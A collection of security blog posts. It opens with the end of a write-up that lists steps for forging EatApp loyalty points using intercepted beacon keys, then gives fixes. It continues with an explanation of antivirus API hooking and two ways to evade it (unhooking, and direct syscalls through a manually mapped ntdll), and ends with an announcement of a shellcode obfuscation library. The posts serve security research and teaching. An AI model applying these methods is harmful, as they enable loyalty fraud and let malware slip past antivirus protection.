Jackpot! I confirmed that the UUID, Major and Minor numbers were exactly the same in the request authorization packet and detected live with the Estimote developer's app. That meant my theory was correct and the verification keys are constantly being broadcasted over the air in every EatApp supported restaurant.

To summarize, here is the step-by-step guide on how to get free EatApp points in restaurant ZZZ:

  • Walk into restaurant ZZZ.
  • Open up Estimote developer's app and detect the closest nearby beacon.
  • Save the screenshot with the visible UUID, Major and Minor values.
  • Go home.
  • Set a breakpoint in Fiddler to intercept EatApp packets with /users/ path in GET requests.
  • On your phone, select the ZZZ restaurant and set EatApp to await PIN authorization for earned points.
  • Enter any PIN.
  • Modify the intercepted packet in Fiddler, removing the "pin":"NNNN" entry and replacing it with the valid "main_beacon":{...} content containing the beacon keys captured with Estimote app.
  • Let the modified packet through to EatApp server.
  • Enjoy your free points!

Of course it would be much better to write you own tool to directly communicate with application's server API while implementing proper location spoofing. The method I described is just quicker and easier for testing purposes.

Conclusion

Broadcasting authorization keys publicly over the air is never a good idea. Here is the list of things that could be done to improve EatApp's security:

  • Send a hash value of account's current state as an additional request parameter (points for every restaurant, account name, last sent GPS location etc.). The server would then verify if the hash is correct and only then authorize the request. Finding out how the hash parameter is formed would not be possible without disassembling and reverse engineering the application's code. That would add additional difficulty.
  • In order to make reverse engineering harder, the application's code should be obfuscated. If the additional hash verification parameter was implemented, it would greatly increase the difficulty of reverse engineering the application's code.
  • @FabricatorGeneral mentioned in the comment section that it is possible to enable Secure UUID feature in Estimote's beacons that would broadcast the beacon keys in encrypted form. That way only applications with the correct API key would be able to decrypt it. Bypassing that would require writing a custom mobile application implementing Estimote SDK, that would listen to broadcasts, decrypting them with application's API key, that would have to be retrieved first by reverse engineering the application's code.
  • Certificate pinning should be implemented to make it harder to intercept the HTTPS connection using forged certificates. This security feature could also be bypassed, but it would involve reverse engineering the application, finding where the certificate verification check is done, removing it and recompiling the application again.
  • Not sure if that is possible with Estimote Beacon's, but it would be good to provide restaurants with a second beacon that would be used only for authorizing transactions with maximum broadcast range of half meter.
  • Never trust the client's device! For maximum security, client's device should only send the reward request to the server, without any authorization keys. Afterwards, the server would send the authorization request to vendor's dedicated tablet behind the counter, requesting him to authorize the point rewards with proper keys. Beacon swiping or entering the PIN would only be done on vendor's device, thus making it impossible for the client to intercept the request that he could later use to create forged packets.

I strongly hope that you've learned something new today and that you found this post entertaining.

If you have any questions, want to send your feedback or you want to contact me for any other reason, you can find me on Twitter @mrgretzky or contact me directly via e-mail at [email protected].

Till next time!

Now it's time to enjoy the spoils of hard work. Cheers!

Edit @2016-08-19: Added two new methods of securing the application in the Conclusion section.

How I Hacked an Android App to Get Free Beer

Defeating Antivirus Real-time Protection From The Inside

28 July 2016 at 05:01
Defeating Antivirus Real-time Protection From The Inside

Hello again! In this post I'd like to talk about the research I did some time ago on antivirus real-time protection mechanism and how I found effective ways to evade it. This method may even work for evading analysis in sandbox environments, but I haven't tested that yet.

The specific AV I was testing this method with was BitDefender. It performs real-time protection for every process in user-mode and detects suspicious behaviour patterns by monitoring the calls to Windows API.

Without further ado, let's jump right to it.

What is Realtime Protection?

Detecting malware by signature detection is still used, but it is not very efficient. More and more malware use polymorphism, metamorphism, encryption or code obfuscation in order to make itself extremely hard to detect using the old detection methods. Most new generation AV software implement behavioral detection analysis. They monitor every running process on the PC and look for suspicious activity patterns that may indicate the computer was infected with malware.

As an example, let's imagine a program that doesn't create any user interface (dialogs, windows etc.) and as soon as it starts, it wants to connect and download files from external server in Romania. This kind of behaviour is extremely suspicious and most AV software with real-time protection, will stop such process and flag it as dangerous even though it may have been seen for the first time.

Now you may ask - how does such protection work and how does the AV know what the monitored process is doing? In majority of cases, AV injects its own code into the running process, which then performs Windows API hooking of specific API functions that are of interest to the protection software. API hooking allows the AV to see exactly what function is called, when and with what parameters. Cuckoo Sandbox, for example, does the same thing for generating the detailed report on how the running program interacts with the operating system.

Let's take a look at how the hook would look like for CreateFileW API imported from kernel32.dll library.

This is how the function code looks like in its original form:

76B73EFC > 8BFF                         MOV EDI,EDI
76B73EFE   55                           PUSH EBP
76B73EFF   8BEC                         MOV EBP,ESP
76B73F01   51                           PUSH ECX
76B73F02   51                           PUSH ECX
76B73F03   FF75 08                      PUSH DWORD PTR SS:[EBP+8]
76B73F06   8D45 F8                      LEA EAX,DWORD PTR SS:[EBP-8]
...
76B73F41   E8 35D7FFFF                  CALL <JMP.&API-MS-Win-Core-File-L1-1-0.C>
76B73F46   C9                           LEAVE
76B73F47   C2 1C00                      RETN 1C

Now if an AV was to hook this function, it would replace the first few bytes with a JMP instruction that would redirect the execution flow to its own hook handler function. That way AV would register the execution of this API with all parameters lying on the stack at that moment. After the AV hook handler finishes, they would execute the original set of bytes, replaced by the JMP instruction and jump back to the API function for the process to continue its execution.

This is how the function code would look like with the injected JMP instruction:

Hook handler:
1D001000     < main hook handler code - logging and monitoring >
...
1D001020     8BFF                       MOV EDI,EDI              ; original code that was replaced with the JMP is executed
1D001022     55                         PUSH EBP
1D001023     8BEC                       MOV EBP,ESP
1D001025    -E9 D72EB759                JMP kernel32.76B73F01    ; jump back to CreateFileW to instruction right after the hook jump

CreateFileW:
76B73EFC >-E9 FFD048A6                  JMP handler.1D001000     ; jump to hook handler
76B73F01   51                           PUSH ECX                 ; execution returns here after hook handler has done its job
76B73F02   51                           PUSH ECX
76B73F03   FF75 08                      PUSH DWORD PTR SS:[EBP+8]
76B73F06   8D45 F8                      LEA EAX,DWORD PTR SS:[EBP-8]
...
76B73F46   C9                           LEAVE
76B73F47   C2 1C00                      RETN 1C

There are multiple ways of hooking code, but this one is the fastest and doesn't create too much bottleneck in code execution performance. Other hooking techniques involve injecting INT3 instructions or properly setting up Debug Registers and handling them with your own exception handlers that later redirect execution to hook handlers.

Now that you know how real-time protection works and how exactly it involves API hooking, I can proceed to explain the methods of bypassing it.

There are AV products on the market that perform real-time monitoring in kernel-mode (Ring0), but this is out of scope of this post and I will focus only on bypassing protections of AV products that perform monitoring in user-mode (Ring3).

The Unhooking Flashbang

As you know already, the real-time protection relies solely on API hook handlers to be executed. Only when the AV hook handler is executed, the protection software can register the call of the API, monitor the parameters and continue mapping the process activity.

It is obvious that in order to completely disable the protection, we need to remove API hooks and as a result the protection software will become blind to everything we do.

In our own application, we control the whole process memory space. AV, with its injected code, is just an intruder trying to tamper with our software's functionality, but we are the king of our land.

Steps to take should be as follows:

  1. Enumerate all loaded DLL libraries in current process.
  2. Find entry-point address of every imported API function of each DLL library.
  3. Remove the injected hook JMP instruction by replacing it with the API's original bytes.

It all seems fairly simple until the point of restoring the API function's original code, from before, when the hook JMP was injected. Getting the original bytes from hook handlers is out of question as there is no way to find out which part of the handler's code is the original API function prologue code. So, how to find the original bytes?

The answer is: Manually retrieve them by reading the respective DLL library file stored on disk. The DLL files contain all the original code.

In order to find the original first 16 bytes (which is more than enough) of CreateFileW API, the process is as follows:

  1. Read the contents of kernel32.dll file from Windows system folder into memory. I will call this module raw_module.
  2. Get the base address of the imported kernel32.dll module in our current process. I will call the imported module imported_module.
  3. Fix the relocations of the manually loaded raw_module with base address of imported_module (retrieved in step 2). This will make all fixed address memory references look the same as they would in the current imported_module (complying with ASLR).
  4. Parse the raw_module export table and find the address of CreateFileW API.
  5. Copy the original 16 bytes from the found exported API address to the address of the currently imported API where the JMP hook resides.

This will effectively overwrite the current JMP with the original bytes of any API.

If you want to read more on parsing Portable Executable files, the best tutorial was written by Iczelion (the website has a great 90's feel too!). Among many subjects, you can learn about parsing the import table and export table of PE files.

When parsing the import table, you need to keep in mind that Microsoft, with release of Windows 7, introduced a strange creature called API Set Schema. It is very important to properly parse the imports pointing to these DLLs. There is a very good explanation of this entity by Geoff Chappel in his The API Set Schema article.

Stealth Calling

The API unhooking method may fool most of the AV products that perform their behavioral analysis in user-mode. This however does not fool enough, the automated sandbox analysis tools like Cuckoo Sandbox. Cuckoo apparently is able to detect if API hooks, it put in place, were removed. That makes the previous method ineffective in the long run.

I thought of another method on how to bypass AV/sandbox monitoring. I am positive it would work, even though I have yet to put it into practice. For sure there is already malware out there implementing this technique.

First of all, I must mention that ntdll.dll library serves as the direct passage between user-mode and kernel-mode. Its exported APIs directly communicate with Windows kernel by using syscalls. Most of the other Windows libraries eventually call APIs from ntdll.dll.

Let's take a look at the code of ZwCreateFile API from ntdll.dll on Windows 7 in WOW64 mode:

77D200F4 > B8 52000000                  MOV EAX,52
77D200F9   33C9                         XOR ECX,ECX
77D200FB   8D5424 04                    LEA EDX,DWORD PTR SS:[ESP+4]
77D200FF   64:FF15 C0000000             CALL DWORD PTR FS:[C0]
77D20106   83C4 04                      ADD ESP,4
77D20109   C2 2C00                      RETN 2C

Basically what it does is pass EAX = 0x52 with stack arguments pointer in EDX to the function, stored in TIB at offset 0xC0. The call switches the CPU mode from 32-bit to 64-bit and executes the syscall in Ring0 to NtCreateFile. 0x52 is the syscall for NtCreateFile on my Windows 7 system, but the syscall numbers are different between Windows versions and even between Service Packs, so it is never a good idea to rely on these numbers. You can find more information about syscalls on Simone Margaritelli blog here.

Most protection software will hook ntdll.dll API as it is the lowest level that you can get to, right in front of the kernel's doorstep. For example if you only hook CreateFileW in kernel32.dll which eventually calls ZwCreateFile in ntdll.dll, you will never catch direct API calls to ZwCreateFile. Although a hook in ZwCreateFile API will be triggered every time CreateFileW or CreateFileA is called as they both eventually must call the lowest level API that communicates directly with the kernel.

There is always one loaded instance of any imported DLL module. That means if any AV or sandbox solution wants to hook the API of a chosen DLL, they will find such module in current process' imported modules list. Following the DLL module's export table, they will find and hook the exported API function of interest.

Now, to the interesting part. What if we copied the code snippet, I pasted above from ntdll.dll, and implemented it in our own application's code. This would be an identical copy of ntdll.dll code that will execute a 0x52 syscall that was executed in our own code section. No user-mode protection software will ever find out about it.
It is an ideal method of bypassing any API hooks without actually detecting and unhooking them!

Thing is, as I mentioned before, we cannot trust the syscall numbers as they will differ between Windows versions. What we can do though is read the whole ntdll.dll library file from disk and manually map it into current process' address space. That way we will be able to execute the code which was prepared exclusively for our version of Windows, while having an exact copy of ntdll.dll outside of AV's reach.

I mentioned ntdll.dll for now as this DLL doesn't have any other dependencies. That means it doesn't have to load any other DLLs and call their API. Its every exported function passes the execution directly to the kernel and not to other user-mode DLLs. It shouldn't stop you from manually importing any other DLL (like kernel32.dll or user32.dll), the same way, if you make sure to walk through the DLLs import table and populate it manually while recursively importing all DLLs from the library's dependencies.
That way the manually mapped modules will use only other manually mapped dependencies and they will never have to touch the modules that were loaded into the address space when the program was started.

Afterwards, it is only a matter of calling the API functions from your manually mapped DLL files in memory and you can be sure that no AV or sandbox software will ever be able to detect such calls or hook them in user-mode.

Conclusion

There is certainly nothing that user-mode AV or sandbox software can do about the evasion methods I described above, other than going deeper into Ring0 and monitoring the process activity from the kernel.

The unhooking method can be countered by protection software re-hooking the API functions, but then the APIs can by unhooked again and the cat and mouse game will never end. In my opinion the stealth calling method is much more professional as it is completely unintrusive, but a bit harder to implement. I may spend some time on the implementation that I will test against all popular sandbox analysis software and publish the results.

As always, I'm always happy to hear your feedback or ideas.

You can hit me up on Twitter @mrgretzky or send an email to [email protected].

Enjoy and see you next time!

Obfusion - C++ X86 Code Obfuscation Library

6 July 2016 at 16:19
Obfusion - C++ X86 Code Obfuscation Library

After several weeks of research and having produced a proof-of-concept code in Python, I have finally found some time to code the obfuscation library in proper programming language. I have named the library Obfusion and I will make sure to expand on its functionality in the future.

Obfusion, at the moment, is able to obfuscate the code, the same way the Python version does, but I made sure to make the code cleaner and more optimized. The obfuscation process should be much faster than previously and I'm sure it can be optimized even more.

Here is the short demo of the library's capabilities. Take a look at this disassembled shellcode sample. This shellcode just executes calc.exe via the WinExec API:

Original shellcode disassembly - exec_calc.lst

I ran this shellcode through Obfusion obfuscator, performing 3 obfuscation passes and here is the disassembled obfuscated shellcode that performs the same tasks as the original:

Obfuscated shellcode disassembly - output.lst

As you can see, that makes it pretty hard to analyze. The shellcode size increased from 189 bytes to 357'236 bytes and you can increase the obfuscation complexity even more at the cost of obfuscation speed.

Those of you who haven't followed my previous research posts on obfuscation, feel free to catch up here:

X86 Shellcode Obfuscation - Part 1

X86 Shellcode Obfuscation - Part 2

X86 Shellcode Obfuscation - Part 3


GitHub

You can follow the development of the Obfusion library on my Github project page here:

Obfusion - full source code on GitHub


Coming up

Make sure to watch this space as I plan to release some blog posts on how to prepare your Metasploit meterpreter shellcodes to be obfuscation-friendly (they are not currently) and I will also demonstrate best ways to infect any Portable Executable file with your own shellcode.

As always, if you want more of what you just read, follow me on Twitter @mrgretzky or send those heart-warming emails to [email protected].

See you soon and have fun with the library!

โŒ
โŒ